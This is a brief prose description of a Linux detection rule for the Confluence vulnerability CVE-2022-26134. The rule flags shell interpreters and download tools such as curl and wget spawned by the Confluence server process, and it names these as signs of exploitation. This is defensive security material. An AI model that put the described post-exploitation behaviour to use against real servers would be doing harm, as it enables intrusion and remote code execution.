This detection rule targets the Atlassian Confluence vulnerability identified as CVE-2022-26134, which allows for the exploitation of the application leading to potential unauthorized access and command execution. The rule specifically monitors for the creation of suspicious child processes by the Confluence server. It does this by analyzing process creation events in a Linux environment, looking for instances where the parent process originates from the Confluence installation directory and involves execution commands commonly used for malicious activities, such as shell interpreters or downloading tools like curl and wget. The high-level detection is aimed at identifying patterns indicative of exploitation attempts and post-exploitation behavior, thereby enabling timely intervention and threat mitigation.